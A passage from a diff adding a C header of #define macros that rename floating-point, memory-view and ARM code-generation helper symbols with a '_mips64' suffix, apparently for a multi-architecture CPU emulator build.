+#define extractFloat128Sign extractFloat128Sign_mips64 +#define extractFloat16Exp extractFloat16Exp_mips64 +#define extractFloat16Frac extractFloat16Frac_mips64 +#define extractFloat16Sign extractFloat16Sign_mips64 +#define extractFloat32Exp extractFloat32Exp_mips64 +#define extractFloat32Frac extractFloat32Frac_mips64 +#define extractFloat32Sign extractFloat32Sign_mips64 +#define extractFloat64Exp extractFloat64Exp_mips64 +#define extractFloat64Frac extractFloat64Frac_mips64 +#define extractFloat64Sign extractFloat64Sign_mips64 +#define extractFloatx80Exp extractFloatx80Exp_mips64 +#define extractFloatx80Frac extractFloatx80Frac_mips64 +#define extractFloatx80Sign extractFloatx80Sign_mips64 +#define fcse_write fcse_write_mips64 +#define find_better_copy find_better_copy_mips64 +#define find_default_machine find_default_machine_mips64 +#define find_desc_by_name find_desc_by_name_mips64 +#define find_first_bit find_first_bit_mips64 +#define find_paging_enabled_cpu find_paging_enabled_cpu_mips64 +#define 
find_ram_block find_ram_block_mips64 +#define find_ram_offset find_ram_offset_mips64 +#define find_string find_string_mips64 +#define find_type find_type_mips64 +#define _fini _fini_mips64 +#define flatrange_equal flatrange_equal_mips64 +#define flatview_destroy flatview_destroy_mips64 +#define flatview_init flatview_init_mips64 +#define flatview_insert flatview_insert_mips64 +#define flatview_lookup flatview_lookup_mips64 +#define flatview_ref flatview_ref_mips64 +#define flatview_simplify flatview_simplify_mips64 +#define flatview_unref flatview_unref_mips64 +#define float128_add float128_add_mips64 +#define float128_compare float128_compare_mips64 +#define float128_compare_internal float128_compare_internal_mips64 +#define float128_compare_quiet float128_compare_quiet_mips64 +#define float128_default_nan float128_default_nan_mips64 +#define float128_div float128_div_mips64 +#define float128_eq float128_eq_mips64 +#define float128_eq_quiet float128_eq_quiet_mips64 +#define float128_is_quiet_nan float128_is_quiet_nan_mips64 +#define float128_is_signaling_nan float128_is_signaling_nan_mips64 +#define float128_le float128_le_mips64 +#define float128_le_quiet float128_le_quiet_mips64 +#define float128_lt float128_lt_mips64 +#define float128_lt_quiet float128_lt_quiet_mips64 +#define float128_maybe_silence_nan float128_maybe_silence_nan_mips64 +#define float128_mul float128_mul_mips64 +#define float128_rem float128_rem_mips64 +#define float128_round_to_int float128_round_to_int_mips64 +#define float128_scalbn float128_scalbn_mips64 +#define float128_sqrt float128_sqrt_mips64 +#define float128_sub float128_sub_mips64 +#define float128ToCommonNaN float128ToCommonNaN_mips64 +#define float128_to_float32 float128_to_float32_mips64 +#define float128_to_float64 float128_to_float64_mips64 +#define float128_to_floatx80 float128_to_floatx80_mips64 +#define float128_to_int32 float128_to_int32_mips64 +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips64 
+#define float128_to_int64 float128_to_int64_mips64 +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips64 +#define float128_unordered float128_unordered_mips64 +#define float128_unordered_quiet float128_unordered_quiet_mips64 +#define float16_default_nan float16_default_nan_mips64 +#define float16_is_quiet_nan float16_is_quiet_nan_mips64 +#define float16_is_signaling_nan float16_is_signaling_nan_mips64 +#define float16_maybe_silence_nan float16_maybe_silence_nan_mips64 +#define float16ToCommonNaN float16ToCommonNaN_mips64 +#define float16_to_float32 float16_to_float32_mips64 +#define float16_to_float64 float16_to_float64_mips64 +#define float32_abs float32_abs_mips64 +#define float32_add float32_add_mips64 +#define float32_chs float32_chs_mips64 +#define float32_compare float32_compare_mips64 +#define float32_compare_internal float32_compare_internal_mips64 +#define float32_compare_quiet float32_compare_quiet_mips64 +#define float32_default_nan float32_default_nan_mips64 +#define float32_div float32_div_mips64 +#define float32_eq float32_eq_mips64 +#define float32_eq_quiet float32_eq_quiet_mips64 +#define float32_exp2 float32_exp2_mips64 +#define float32_exp2_coefficients float32_exp2_coefficients_mips64 +#define float32_is_any_nan float32_is_any_nan_mips64 +#define float32_is_infinity float32_is_infinity_mips64 +#define float32_is_neg float32_is_neg_mips64 +#define float32_is_quiet_nan float32_is_quiet_nan_mips64 +#define float32_is_signaling_nan float32_is_signaling_nan_mips64 +#define float32_is_zero float32_is_zero_mips64 +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_mips64 +#define float32_le float32_le_mips64 +#define float32_le_quiet float32_le_quiet_mips64 +#define float32_log2 float32_log2_mips64 +#define float32_lt float32_lt_mips64 +#define float32_lt_quiet float32_lt_quiet_mips64 +#define float32_max float32_max_mips64 +#define float32_maxnum float32_maxnum_mips64 +#define float32_maxnummag 
float32_maxnummag_mips64 +#define float32_maybe_silence_nan float32_maybe_silence_nan_mips64 +#define float32_min float32_min_mips64 +#define float32_minmax float32_minmax_mips64 +#define float32_minnum float32_minnum_mips64 +#define float32_minnummag float32_minnummag_mips64 +#define float32_mul float32_mul_mips64 +#define float32_muladd float32_muladd_mips64 +#define float32_rem float32_rem_mips64 +#define float32_round_to_int float32_round_to_int_mips64 +#define float32_scalbn float32_scalbn_mips64 +#define float32_set_sign float32_set_sign_mips64 +#define float32_sqrt float32_sqrt_mips64 +#define float32_squash_input_denormal float32_squash_input_denormal_mips64 +#define float32_sub float32_sub_mips64 +#define float32ToCommonNaN float32ToCommonNaN_mips64 +#define float32_to_float128 float32_to_float128_mips64 +#define float32_to_float16 float32_to_float16_mips64 +#define float32_to_float64 float32_to_float64_mips64 +#define float32_to_floatx80 float32_to_floatx80_mips64 +#define float32_to_int16 float32_to_int16_mips64 +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips64 +#define float32_to_int32 float32_to_int32_mips64 +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips64 +#define float32_to_int64 float32_to_int64_mips64 +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips64 +#define float32_to_uint16 float32_to_uint16_mips64 +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips64 +#define float32_to_uint32 float32_to_uint32_mips64 +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips64 +#define float32_to_uint64 float32_to_uint64_mips64 +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips64 +#define float32_unordered float32_unordered_mips64 +#define float32_unordered_quiet float32_unordered_quiet_mips64 +#define float64_abs float64_abs_mips64 +#define float64_add float64_add_mips64 +#define float64_chs 
float64_chs_mips64 +#define float64_compare float64_compare_mips64 +#define float64_compare_internal float64_compare_internal_mips64 +#define float64_compare_quiet float64_compare_quiet_mips64 +#define float64_default_nan float64_default_nan_mips64 +#define float64_div float64_div_mips64 +#define float64_eq float64_eq_mips64 +#define float64_eq_quiet float64_eq_quiet_mips64 +#define float64_is_any_nan float64_is_any_nan_mips64 +#define float64_is_infinity float64_is_infinity_mips64 +#define float64_is_neg float64_is_neg_mips64 +#define float64_is_quiet_nan float64_is_quiet_nan_mips64 +#define float64_is_signaling_nan float64_is_signaling_nan_mips64 +#define float64_is_zero float64_is_zero_mips64 +#define float64_le float64_le_mips64 +#define float64_le_quiet float64_le_quiet_mips64 +#define float64_log2 float64_log2_mips64 +#define float64_lt float64_lt_mips64 +#define float64_lt_quiet float64_lt_quiet_mips64 +#define float64_max float64_max_mips64 +#define float64_maxnum float64_maxnum_mips64 +#define float64_maxnummag float64_maxnummag_mips64 +#define float64_maybe_silence_nan float64_maybe_silence_nan_mips64 +#define float64_min float64_min_mips64 +#define float64_minmax float64_minmax_mips64 +#define float64_minnum float64_minnum_mips64 +#define float64_minnummag float64_minnummag_mips64 +#define float64_mul float64_mul_mips64 +#define float64_muladd float64_muladd_mips64 +#define float64_rem float64_rem_mips64 +#define float64_round_to_int float64_round_to_int_mips64 +#define float64_scalbn float64_scalbn_mips64 +#define float64_set_sign float64_set_sign_mips64 +#define float64_sqrt float64_sqrt_mips64 +#define float64_squash_input_denormal float64_squash_input_denormal_mips64 +#define float64_sub float64_sub_mips64 +#define float64ToCommonNaN float64ToCommonNaN_mips64 +#define float64_to_float128 float64_to_float128_mips64 +#define float64_to_float16 float64_to_float16_mips64 +#define float64_to_float32 float64_to_float32_mips64 +#define float64_to_floatx80 
float64_to_floatx80_mips64 +#define float64_to_int16 float64_to_int16_mips64 +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips64 +#define float64_to_int32 float64_to_int32_mips64 +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips64 +#define float64_to_int64 float64_to_int64_mips64 +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips64 +#define float64_to_uint16 float64_to_uint16_mips64 +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips64 +#define float64_to_uint32 float64_to_uint32_mips64 +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips64 +#define float64_to_uint64 float64_to_uint64_mips64 +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips64 +#define float64_trunc_to_int float64_trunc_to_int_mips64 +#define float64_unordered float64_unordered_mips64 +#define float64_unordered_quiet float64_unordered_quiet_mips64 +#define float_raise float_raise_mips64 +#define floatx80_add floatx80_add_mips64 +#define floatx80_compare floatx80_compare_mips64 +#define floatx80_compare_internal floatx80_compare_internal_mips64 +#define floatx80_compare_quiet floatx80_compare_quiet_mips64 +#define floatx80_default_nan floatx80_default_nan_mips64 +#define floatx80_div floatx80_div_mips64 +#define floatx80_eq floatx80_eq_mips64 +#define floatx80_eq_quiet floatx80_eq_quiet_mips64 +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips64 +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips64 +#define floatx80_le floatx80_le_mips64 +#define floatx80_le_quiet floatx80_le_quiet_mips64 +#define floatx80_lt floatx80_lt_mips64 +#define floatx80_lt_quiet floatx80_lt_quiet_mips64 +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_mips64 +#define floatx80_mul floatx80_mul_mips64 +#define floatx80_rem floatx80_rem_mips64 +#define floatx80_round_to_int floatx80_round_to_int_mips64 +#define floatx80_scalbn 
floatx80_scalbn_mips64 +#define floatx80_sqrt floatx80_sqrt_mips64 +#define floatx80_sub floatx80_sub_mips64 +#define floatx80ToCommonNaN floatx80ToCommonNaN_mips64 +#define floatx80_to_float128 floatx80_to_float128_mips64 +#define floatx80_to_float32 floatx80_to_float32_mips64 +#define floatx80_to_float64 floatx80_to_float64_mips64 +#define floatx80_to_int32 floatx80_to_int32_mips64 +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips64 +#define floatx80_to_int64 floatx80_to_int64_mips64 +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips64 +#define floatx80_unordered floatx80_unordered_mips64 +#define floatx80_unordered_quiet floatx80_unordered_quiet_mips64 +#define flush_icache_range flush_icache_range_mips64 +#define format_string format_string_mips64 +#define fp_decode_rm fp_decode_rm_mips64 +#define frame_dummy frame_dummy_mips64 +#define free_range free_range_mips64 +#define fstat64 fstat64_mips64 +#define futex_wait futex_wait_mips64 +#define futex_wake futex_wake_mips64 +#define gen_aa32_ld16s gen_aa32_ld16s_mips64 +#define gen_aa32_ld16u gen_aa32_ld16u_mips64 +#define gen_aa32_ld32u gen_aa32_ld32u_mips64 +#define gen_aa32_ld64 gen_aa32_ld64_mips64 +#define gen_aa32_ld8s gen_aa32_ld8s_mips64 +#define gen_aa32_ld8u gen_aa32_ld8u_mips64 +#define gen_aa32_st16 gen_aa32_st16_mips64 +#define gen_aa32_st32 gen_aa32_st32_mips64 +#define gen_aa32_st64 gen_aa32_st64_mips64 +#define gen_aa32_st8 gen_aa32_st8_mips64 +#define gen_adc gen_adc_mips64 +#define gen_adc_CC gen_adc_CC_mips64 +#define gen_add16 gen_add16_mips64 +#define gen_add_carry gen_add_carry_mips64 +#define gen_add_CC gen_add_CC_mips64 +#define gen_add_datah_offset gen_add_datah_offset_mips64 +#define gen_add_data_offset gen_add_data_offset_mips64 +#define gen_addq gen_addq_mips64 +#define gen_addq_lo gen_addq_lo_mips64 +#define gen_addq_msw gen_addq_msw_mips64 +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_mips64 +#define gen_arm_shift_im 
gen_arm_shift_im_mips64 +#define gen_arm_shift_reg gen_arm_shift_reg_mips64 +#define gen_bx gen_bx_mips64 +#define gen_bx_im gen_bx_im_mips64 +#define gen_clrex gen_clrex_mips64 +#define generate_memory_topology generate_memory_topology_mips64 +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_mips64 +#define gen_exception gen_exception_mips64 +#define gen_exception_insn gen_exception_insn_mips64 +#define gen_exception_internal gen_exception_internal_mips64 +#define gen_exception_internal_insn gen_exception_internal_insn_mips64 +#define gen_exception_return gen_exception_return_mips64 +#define gen_goto_tb gen_goto_tb_mips64 +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_mips64 +#define gen_helper_add_saturate gen_helper_add_saturate_mips64 +#define gen_helper_add_setq gen_helper_add_setq_mips64 +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_mips64 +#define gen_helper_clz32 gen_helper_clz32_mips64 +#define gen_helper_clz64 gen_helper_clz64_mips64 +#define gen_helper_clz_arm gen_helper_clz_arm_mips64 +#define gen_helper_cpsr_read gen_helper_cpsr_read_mips64 +#define gen_helper_cpsr_write gen_helper_cpsr_write_mips64 +#define gen_helper_crc32_arm gen_helper_crc32_arm_mips64 +#define gen_helper_crc32c gen_helper_crc32c_mips64 +#define gen_helper_crypto_aese gen_helper_crypto_aese_mips64 +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_mips64 +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_mips64 +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_mips64 +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_mips64 +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_mips64 +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_mips64 +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_mips64 +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_mips64 +#define gen_helper_double_saturate gen_helper_double_saturate_mips64 +#define 
gen_helper_exception_internal gen_helper_exception_internal_mips64 +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_mips64 +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_mips64 +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_mips64 +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_mips64 +#define gen_helper_get_user_reg gen_helper_get_user_reg_mips64 +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_mips64 +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_mips64 +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_mips64 +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_mips64 +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_mips64 +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_mips64 +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_mips64 +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_mips64 +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_mips64 +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_mips64 +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_mips64 +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_mips64 +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_mips64 +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_mips64 +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_mips64 +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_mips64 +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_mips64 +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_mips64 +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_mips64 +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_mips64 +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_mips64 +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_mips64 +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_mips64 +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_mips64 +#define gen_helper_iwmmxt_cmpgtsl 
gen_helper_iwmmxt_cmpgtsl_mips64 +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_mips64 +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_mips64 +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_mips64 +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_mips64 +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_mips64 +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_mips64 +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_mips64 +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_mips64 +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_mips64 +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_mips64 +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_mips64 +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_mips64 +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_mips64 +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_mips64 +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_mips64 +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_mips64 +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_mips64 +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_mips64 +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_mips64 +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_mips64 +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_mips64 +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_mips64 +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_mips64 +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_mips64 +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_mips64 +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_mips64 +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_mips64 +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_mips64 +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_mips64 +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_mips64 +#define 
gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_mips64 +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_mips64 +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_mips64 +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_mips64 +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_mips64 +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_mips64 +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_mips64 +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_mips64 +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_mips64 +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_mips64 +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_mips64 +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_mips64 +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_mips64 +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_mips64 +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_mips64 +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_mips64 +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_mips64 +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_mips64 +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_mips64 +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_mips64 +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_mips64 +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_mips64 +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_mips64 +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_mips64 +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_mips64 +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_mips64 +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_mips64 +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_mips64 +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_mips64 +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_mips64 +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_mips64 +#define 
gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_mips64 +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_mips64 +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_mips64 +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_mips64 +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_mips64 +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_mips64 +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_mips64 +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_mips64 +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_mips64 +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_mips64 +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_mips64 +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_mips64 +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_mips64 +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_mips64 +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_mips64 +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_mips64 +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_mips64 +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_mips64 +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_mips64 +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_mips64 +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_mips64 +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_mips64 +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_mips64 +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_mips64 +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_mips64 +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_mips64 +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_mips64 +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_mips64 +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_mips64 +#define 
gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_mips64 +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_mips64 +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_mips64 +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_mips64 +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_mips64 +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_mips64 +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_mips64 +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_mips64 +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_mips64 +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_mips64 +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_mips64 +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_mips64 +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_mips64 +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_mips64 +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_mips64 +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_mips64 +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_mips64 +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_mips64 +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_mips64 +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_mips64 +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_mips64 +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_mips64 +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_mips64 +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_mips64 +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_mips64 +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_mips64 +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_mips64 +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_mips64 +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_mips64 +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_mips64 +#define gen_helper_neon_cgt_u8 
gen_helper_neon_cgt_u8_mips64 +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_mips64 +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_mips64 +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_mips64 +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_mips64 +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_mips64 +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_mips64 +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_mips64 +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_mips64 +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_mips64 +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_mips64 +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_mips64 +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_mips64 +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_mips64 +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_mips64 +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_mips64 +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_mips64 +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_mips64 +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_mips64 +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_mips64 +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_mips64 +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_mips64 +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_mips64 +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_mips64 +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_mips64 +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_mips64 +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_mips64 +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_mips64 +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_mips64 +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_mips64 +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_mips64 +#define 
gen_helper_neon_min_u32 gen_helper_neon_min_u32_mips64 +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_mips64 +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_mips64 +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_mips64 +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_mips64 +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_mips64 +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_mips64 +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_mips64 +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_mips64 +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_mips64 +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_mips64 +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_mips64 +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_mips64 +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_mips64 +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_mips64 +#define gen_helper_neon_narrow_sat_s32 